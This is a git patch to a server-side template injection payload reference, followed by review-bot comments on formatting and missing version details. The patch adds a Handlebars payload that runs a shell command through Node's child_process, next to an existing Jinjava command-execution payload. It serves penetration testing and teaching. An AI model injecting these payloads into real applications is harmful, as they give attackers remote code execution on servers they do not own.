From 76e6f7dc95784a2aaaf6c22dacb065887fe037dd Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Wed, 19 Aug 2020 14:20:18 +0200 Subject: [PATCH] Update README.md Add Handlebars payload --- Server Side Template Injection/README.md | 34 +++++++++++++++++++++++- 1 file changed, 33 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 2f88b82..2d63970 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -44,6 +44,7 @@ * [Jinjava](#jinjava) * [Basic injection](#basic-injection) * [Command execution](#command-execution) +* [Handlebars](#handlebars) * [ASP.NET Razor](#aspnet-razor) * [Basic injection](#basic-injection) * [Command execution](#command-execution) 
@@ -476,6 +477,37 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` +## Handlebars + +### Command Execution + +```handlebars +{{#with "s" as |string|}} + {{#with "e"}} + {{#with split as |conslist|}} + {{this.pop}} + {{this.push (lookup string.sub "constructor")}} + {{this.pop}} + {{#with string.split as |codelist|}} + {{this.pop}} + {{this.push "return require('child_process').execSync('ls -la');"}} + {{this.pop}} + {{#each conslist}} + {{#with (string.sub.apply 0 codelist)}} + {{this}} + {{/with}} + {{/each}} + {{/with}} + {{/with}} + {{/with}} +{{/with}} +``` + +### References + +- [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) +- [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) + ## ASP.NET Razor ### Basic injection 
@@ -510,4 +542,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) * [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) * [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) -* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) \ No newline at end of file +* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
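Review bot: The new `* [Handlebars](#handlebars)` line in the table-of-contents hunk has no sub-entries, while the neighbouring Jinjava and ASP.NET Razor entries each list `* [Basic injection](#basic-injection)` and `* [Command execution](#command-execution)`. Add a matching `* [Command execution](#command-execution)` line under Handlebars so the TOC reflects the section that the second hunk adds. Separately, several sections already link to the same `#command-execution` anchor; GitHub suffixes duplicate heading ids, so these links resolve to the first such heading rather than the section they sit under, and the new entry will inherit that problem unless the anchors are made unique.

Review bot: The `## Handlebars` section added in the second hunk says nothing about which Handlebars versions the payload applies to or whether it has since been closed, whereas the Jinjava section it sits under records `Fixed by https://github.com/HubSpot/jinjava/pull/230`. Without that, a reader cannot tell whether a given deployment is still affected; add a line stating the versions the payload was verified against and, if one exists, the release that closes it, together with a short sentence noting that the chain depends on `lookup string.sub "constructor"` resolving a prototype property, which is what a fix or hardening setting would need to block. Smaller points in the same hunk: `### Command Execution` should read `### Command execution` to match the sibling headings; the per-section `### References` sub-list duplicates the page-level reference list that the third hunk touches, so its two links belong there; and the first link text carries a trailing space before `]` (`Shopify app ]`). A `### Basic injection` subsection with a detection probe, as the other engines have, would also let a tester confirm the engine before using the full payload.

Review bot: The third hunk is whitespace-only: it removes and re-adds the same Asif Durani reference line so that the file ends with a newline (`\ No newline at end of file` disappears). That is fine to include, but the commit message mentions only the Handlebars payload; a brief note there keeps the history accurate.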